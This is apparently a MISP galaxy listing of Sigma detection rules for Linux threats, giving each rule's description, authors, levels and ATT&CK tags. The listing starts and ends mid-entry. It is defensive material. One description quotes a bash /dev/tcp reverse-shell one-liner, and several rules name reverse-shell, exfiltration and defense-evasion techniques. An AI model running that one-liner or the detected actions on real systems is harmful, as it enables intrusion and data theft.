creation_date 2018/02/20
falsepositive ['Unknown']
filename lnx_syslog_susp_named.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Disabling Security Tools - Builtin

Detects disabling security tools

Internal MISP references

UUID 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 which can be used as unique global reference for Disabling Security Tools - Builtin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, Alejandro Ortuno, oscd.community
creation_date 2020/06/17
falsepositive ['Legitimate administration activities']
filename lnx_syslog_security_tools_disabling_syslog.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Persistence Via Cron Files

Detects creation of a cron file or files in cron directories, which could indicate potential persistence.

Internal MISP references

UUID 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 which can be used as unique global reference for Persistence Via Cron Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Any legitimate cron file.']
filename file_event_lnx_persistence_cron_files.yml
level medium
logsource.category file_event
logsource.product linux
tags ['attack.persistence', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

Wget Creating Files in Tmp Directory

Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"

Internal MISP references

UUID 35a05c60-9012-49b6-a11f-6bab741c9f74 which can be used as unique global reference for Wget Creating Files in Tmp Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Legitimate downloads of files in the tmp folder.']
filename file_event_lnx_wget_download_file_in_tmp_dir.yml
level medium
logsource.category file_event
logsource.product linux
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Shell Script Creation in Profile Folder

Detects the creation of shell scripts under the "profile.d" path.

Internal MISP references

UUID 13f08f54-e705-4498-91fd-cce9d9cee9f1 which can be used as unique global reference for Potentially Suspicious Shell Script Creation in Profile Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.', 'Regular file creation during system update or software installation by the package manager']
filename file_event_lnx_susp_shell_script_under_profile_directory.yml
level low
logsource.category file_event
logsource.product linux
tags ['attack.persistence']

Persistence Via Sudoers Files

Detects creation of a sudoers file or files in the "sudoers.d" directory, which can be used as a potential method to persist privileges for a specific user.

Internal MISP references

UUID ddb26b76-4447-4807-871f-1b035b2bfa5d which can be used as unique global reference for Persistence Via Sudoers Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Creation of legitimate files in sudoers.d folder part of administrator work']
filename file_event_lnx_persistence_sudoers_files.yml
level medium
logsource.category file_event
logsource.product linux
tags ['attack.persistence', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

Triple Cross eBPF Rootkit Default LockFile

Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.

Internal MISP references

UUID c0239255-822c-4630-b7f1-35362bcb8f44 which can be used as unique global reference for Triple Cross eBPF Rootkit Default LockFile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Unlikely']
filename file_event_lnx_triple_cross_rootkit_lock_file.yml
level high
logsource.category file_event
logsource.product linux
tags ['attack.defense_evasion']

Triple Cross eBPF Rootkit Default Persistence

Detects the creation of "ebpfbackdoor" files in both the "cron.d" and "sudoers.d" directories, both of which are related to the TripleCross persistence method

Internal MISP references

UUID 1a2ea919-d11d-4d1e-8535-06cda13be20f which can be used as unique global reference for Triple Cross eBPF Rootkit Default Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Unlikely']
filename file_event_lnx_triple_cross_rootkit_persistence.yml
level high
logsource.category file_event
logsource.product linux
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

Linux Doas Conf File Creation

Detects the creation of a doas.conf file on a Linux host.

Internal MISP references

UUID 00eee2a5-fdb0-4746-a21d-e43fbdea5681 which can be used as unique global reference for Linux Doas Conf File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S, Teoderick Contreras
creation_date 2022/01/20
falsepositive ['Unlikely']
filename file_event_lnx_doas_conf_creation.yml
level medium
logsource.category file_event
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Communication To Ngrok Tunneling Service - Linux

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors

Internal MISP references

UUID 19bf6fdb-7721-4f3d-867f-53467f6a5db6 which can be used as unique global reference for Communication To Ngrok Tunneling Service - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/03
falsepositive ['Legitimate use of ngrok']
filename net_connection_lnx_ngrok_tunnel.yml
level high
logsource.category network_connection
logsource.product linux
tags ['attack.exfiltration', 'attack.command_and_control', 'attack.t1567', 'attack.t1568.002', 'attack.t1572', 'attack.t1090', 'attack.t1102', 'attack.s0508']
Related clusters

To see the related clusters, click here.

Linux Reverse Shell Indicator

Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Internal MISP references

UUID 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 which can be used as unique global reference for Linux Reverse Shell Indicator in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/16
falsepositive ['Unknown']
filename net_connection_lnx_back_connect_shell_dev.yml
level critical
logsource.category network_connection
logsource.product linux
tags ['attack.execution', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Linux Crypto Mining Pool Connections

Detects process connections to a Monero crypto mining pool

Internal MISP references

UUID a46c93b7-55ed-4d27-a41b-c259456c4746 which can be used as unique global reference for Linux Crypto Mining Pool Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Legitimate use of crypto miners']
filename net_connection_lnx_crypto_mining_indicators.yml
level high
logsource.category network_connection
logsource.product linux
tags ['attack.impact', 'attack.t1496']
Related clusters

To see the related clusters, click here.

Sudo Privilege Escalation CVE-2019-14287

Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287

Internal MISP references

UUID f74107df-b6c6-4e80-bf00-4170b658162b which can be used as unique global reference for Sudo Privilege Escalation CVE-2019-14287 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/15
falsepositive ['Unlikely']
filename proc_creation_lnx_sudo_cve_2019_14287.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1068', 'attack.t1548.003', 'cve.2019.14287']
Related clusters

To see the related clusters, click here.

Decode Base64 Encoded Text

Detects usage of base64 utility to decode arbitrary base64-encoded text

Internal MISP references

UUID e2072cab-8c9a-459b-b63c-40ae79e27031 which can be used as unique global reference for Decode Base64 Encoded Text in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_lnx_base64_decode.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Nohup Execution

Detects execution of binaries located in potentially suspicious locations via "nohup"

Internal MISP references

UUID 457df417-8b9d-4912-85f3-9dbda39c3645 which can be used as unique global reference for Suspicious Nohup Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_nohup_susp_execution.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Linux Remote System Discovery

Detects the enumeration of other remote systems.

Internal MISP references

UUID 11063ec2-de63-4153-935e-b1a8b9e616f1 which can be used as unique global reference for Linux Remote System Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/22
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_remote_system_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

Disabling Security Tools

Detects disabling security tools

Internal MISP references

UUID e3a8a052-111f-4606-9aee-f28ebeb76776 which can be used as unique global reference for Disabling Security Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, Alejandro Ortuno, oscd.community
creation_date 2020/06/17
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_security_tools_disabling.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Triple Cross eBPF Rootkit Execve Hijack

Detects execution of the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges

Internal MISP references

UUID 0326c3c8-7803-4a0f-8c5c-368f747f7c3e which can be used as unique global reference for Triple Cross eBPF Rootkit Execve Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Unlikely']
filename proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Vim GTFOBin Abuse - Linux

Detects usage of "vim" and its siblings as a GTFOBin to execute and proxy command and binary execution

Internal MISP references

UUID 7ab8f73a-fcff-428b-84aa-6a5ff7877dea which can be used as unique global reference for Vim GTFOBin Abuse - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_lnx_gtfobin_vim.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Execution Of Script Located In Potentially Suspicious Directory

Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.

Internal MISP references

UUID 30bcce26-51c5-49f2-99c8-7b59e3af36c7 which can be used as unique global reference for Execution Of Script Located In Potentially Suspicious Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Interactive Bash Suspicious Children

Detects suspicious interactive bash as a parent to rather uncommon child processes

Internal MISP references

UUID ea3ecad2-db86-4a89-ad0b-132a10d2db55 which can be used as unique global reference for Interactive Bash Suspicious Children in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/14
falsepositive ['Legitimate software that uses these patterns']
filename proc_creation_lnx_susp_interactive_bash.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059.004', 'attack.t1036']
Related clusters

To see the related clusters, click here.

File and Directory Discovery - Linux

Detects usage of system utilities to discover files and directories

Internal MISP references

UUID d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72 which can be used as unique global reference for File and Directory Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_lnx_file_and_directory_discovery.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

OS Architecture Discovery Via Grep

Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"

Internal MISP references

UUID d27ab432-2199-483f-a297-03633c05bae6 which can be used as unique global reference for OS Architecture Discovery Via Grep in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_grep_os_arch_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Potential Discovery Activity Using Find - Linux

Detects usage of "find" binary in a suspicious manner to perform discovery

Internal MISP references

UUID 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf which can be used as unique global reference for Potential Discovery Activity Using Find - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_lnx_susp_find_execution.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Clipboard Collection with Xclip Tool

Detects attempts to collect data stored in the clipboard from users with the usage of the xclip tool. Xclip has to be installed. Using this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations.

Internal MISP references

UUID ec127035-a636-4b9a-8555-0efd4e59f316 which can be used as unique global reference for Clipboard Collection with Xclip Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Legitimate usage of xclip tools.']
filename proc_creation_lnx_clipboard_collection.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

Linux Package Uninstall

Detects Linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".

Internal MISP references

UUID 95d61234-7f56-465c-6f2d-b562c6fedbc4 which can be used as unique global reference for Linux Package Uninstall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/09
falsepositive ['Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).']
filename proc_creation_lnx_remove_package.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Local System Accounts Discovery - Linux

Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Internal MISP references

UUID b45e3d6f-42c6-47d8-a478-df6bd6cf534c which can be used as unique global reference for Local System Accounts Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_local_account.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1087.001']
Related clusters

To see the related clusters, click here.

Linux Recon Indicators

Detects events with patterns found in commands used for reconnaissance on Linux systems

Internal MISP references

UUID 0cf7a157-8879-41a2-8f55-388dd23746b7 which can be used as unique global reference for Linux Recon Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_susp_recon_indicators.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1592.004', 'attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Linux HackTool Execution

Detects known hacktool execution based on image name.

Internal MISP references

UUID a015e032-146d-4717-8944-7a1884122111 which can be used as unique global reference for Linux HackTool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
creation_date 2023/01/03
falsepositive ['Unlikely']
filename proc_creation_lnx_susp_hktl_execution.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.resource_development', 'attack.t1587']
Related clusters

To see the related clusters, click here.

Chmod Suspicious Directory

Detects chmod targeting files in abnormal directory paths.

Internal MISP references

UUID 6419afd1-3742-47a5-a7e6-b50386cd15f8 which can be used as unique global reference for Chmod Suspicious Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/03
falsepositive ['Admin changing file permissions.']
filename proc_creation_lnx_susp_chmod_directories.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1222.002']
Related clusters

To see the related clusters, click here.

Python Spawning Pretty TTY

Detects python spawning a pretty tty which could be indicative of potential reverse shell activity

Internal MISP references

UUID c4042d54-110d-45dd-a0e1-05c47822c937 which can be used as unique global reference for Python Spawning Pretty TTY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nextron Systems
creation_date 2022/06/03
falsepositive ['Unknown']
filename proc_creation_lnx_python_pty_spawn.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Flush Iptables Ufw Chain

Detects use of iptables to flush all firewall rules, tables and chains and allow all network traffic

Internal MISP references

UUID 3be619f4-d9ec-4ea8-a173-18fdd01996ab which can be used as unique global reference for Flush Iptables Ufw Chain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/18
falsepositive ['Network administrators']
filename proc_creation_lnx_iptables_flush_ufw.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Potential Perl Reverse Shell Execution

Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity

Internal MISP references

UUID 259df6bc-003f-4306-9f54-4ff1a08fa38e which can be used as unique global reference for Potential Perl Reverse Shell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/07
falsepositive ['Unlikely']
filename proc_creation_lnx_perl_reverse_shell.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Atlassian Confluence CVE-2022-26134

Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134

Internal MISP references

UUID 7fb14105-530e-4e2e-8cfb-99f7d8700b66 which can be used as unique global reference for Atlassian Confluence CVE-2022-26134 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/03
falsepositive ['Unknown']
filename proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.initial_access', 'attack.execution', 'attack.t1190', 'attack.t1059', 'cve.2022.26134']
Related clusters

To see the related clusters, click here.

Potential Xterm Reverse Shell

Detects usage of "xterm" as a potential reverse shell tunnel

Internal MISP references

UUID 4e25af4b-246d-44ea-8563-e42aacab006b which can be used as unique global reference for Potential Xterm Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_
creation_date 2023/04/24
falsepositive ['Unknown']
filename proc_creation_lnx_xterm_reverse_shell.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Curl File Upload - Linux

Detects a suspicious curl process start that adds a file to a web request

Internal MISP references

UUID 00b90cc1-17ec-402c-96ad-3a8117d7a582 which can be used as unique global reference for Suspicious Curl File Upload - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
creation_date 2022/09/15
falsepositive ['Scripts created by developers and admins']
filename proc_creation_lnx_susp_curl_fileupload.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.exfiltration', 'attack.t1567', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potential Ruby Reverse Shell

Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to set up a reverse shell

Internal MISP references

UUID b8bdac18-c06e-4016-ac30-221553e74f59 which can be used as unique global reference for Potential Ruby Reverse Shell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @d4ns4n_
creation_date 2023/04/07
falsepositive ['Unknown']
filename proc_creation_lnx_ruby_reverse_shell.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Apt GTFOBin Abuse - Linux

Detects usage of "apt" and "apt-get" as a GTFOBin to execute and proxy command and binary execution

Internal MISP references

UUID bb382fd5-b454-47ea-a264-1828e4c766d6 which can be used as unique global reference for Apt GTFOBin Abuse - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/28
falsepositive ['Unknown']
filename proc_creation_lnx_gtfobin_apt.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

User Has Been Deleted Via Userdel

Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks

Internal MISP references

UUID 08f26069-6f80-474b-8d1f-d971c6fedea0 which can be used as unique global reference for User Has Been Deleted Via Userdel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tuan Le (NCSGroup)
creation_date 2022/12/26
falsepositive ['Legitimate administrator activities']
filename proc_creation_lnx_userdel.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

System Information Discovery

Detects system information discovery commands

Internal MISP references

UUID 42df45e7-e6e9-43b5-8f26-bec5b39cc239 which can be used as unique global reference for System Information Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_system_info_discovery.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Linux Network Service Scanning Tools Execution

Detects execution of network scanning and reconnaissance tools. These tools can be used for the enumeration of local or remote network services, for example.

Internal MISP references

UUID 3e102cd9-a70d-4a7a-9508-403963092f31 which can be used as unique global reference for Linux Network Service Scanning Tools Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])
creation_date 2020/10/21
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_susp_network_utilities_execution.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Linux Crypto Mining Indicators

Detects command line parameters or strings often used by crypto miners

Internal MISP references

UUID 9069ea3c-b213-4c52-be13-86506a227ab1 which can be used as unique global reference for Linux Crypto Mining Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Legitimate use of crypto miners']
filename proc_creation_lnx_crypto_mining.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1496']
Related clusters

To see the related clusters, click here.

Terminate Linux Process Via Kill

Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.

Internal MISP references

UUID 64c41342-6b27-523b-5d3f-c265f3efcdb3 which can be used as unique global reference for Terminate Linux Process Via Kill in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tuan Le (NCSGroup)
creation_date 2023/03/16
falsepositive ['Likely']
filename proc_creation_lnx_kill_process.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

DD File Overwrite

Detects potential overwriting and deletion of a file using DD.

Internal MISP references

UUID 2953194b-e33c-4859-b9e8-05948c167447 which can be used as unique global reference for DD File Overwrite in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/10/15
falsepositive ['Any user deleting files that way.']
filename proc_creation_lnx_dd_file_overwrite.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

Named Pipe Created Via Mkfifo

Detects the creation of a new named pipe using the "mkfifo" utility

Internal MISP references

UUID 9d779ce8-5256-4b13-8b6f-b91c602b43f4 which can be used as unique global reference for Named Pipe Created Via Mkfifo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/16
falsepositive ['Unknown']
filename proc_creation_lnx_mkfifo_named_pipe_creation.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Suspicious Package Installed - Linux

Detects installation of suspicious packages using system installation utilities

Internal MISP references

UUID 700fb7e8-2981-401c-8430-be58e189e741 which can be used as unique global reference for Suspicious Package Installed - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/03
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_install_suspicioua_packages.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Scheduled Cron Task/Job - Linux

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.

Internal MISP references

UUID 6b14bac8-3e3a-4324-8109-42f0546a347f which can be used as unique global reference for Scheduled Cron Task/Job - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_schedule_task_job_cron.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1053.003']
Related clusters

To see the related clusters, click here.

System Network Connections Discovery - Linux

Detects usage of system utilities to discover system network connections

Internal MISP references

UUID 4c519226-f0cd-4471-bd2f-6fbb2bb68a79 which can be used as unique global reference for System Network Connections Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_lnx_system_network_connections_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1049']
Related clusters

To see the related clusters, click here.

ESXi VM Kill Via ESXCLI

Detects execution of the "esxcli" command with the "vm" and "kill" flags in order to kill/shutdown a specific VM.

Internal MISP references

UUID 2992ac4d-31e9-4325-99f2-b18a73221bb2 which can be used as unique global reference for ESXi VM Kill Via ESXCLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
creation_date 2023/09/04
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_esxcli_vm_kill.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Shell Execution Of Process Located In Tmp Directory

Detects execution of shells from a parent process located in a temporary (/tmp) directory

Internal MISP references

UUID 2fade0b6-7423-4835-9d4f-335b39b83867 which can be used as unique global reference for Shell Execution Of Process Located In Tmp Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.execution']

Ufw Force Stop Using Ufw-Init

Detects attempts to force stop the ufw using ufw-init

Internal MISP references

UUID 84c9e83c-599a-458a-a0cb-0ecce44e807a which can be used as unique global reference for Ufw Force Stop Using Ufw-Init in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/01/18
falsepositive ['Network administrators']
filename proc_creation_lnx_disable_ufw.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

System Network Discovery - Linux

Detects enumeration of local network configuration

Internal MISP references

UUID e7bd1cfa-b446-4c88-8afb-403bcd79e3fa which can be used as unique global reference for System Network Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal and remotephone, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_system_network_discovery.yml
level informational
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1016']
Related clusters

To see the related clusters, click here.

Suspicious Curl Change User Agents - Linux

Detects a suspicious curl process start on Linux with user-agent options set

Internal MISP references

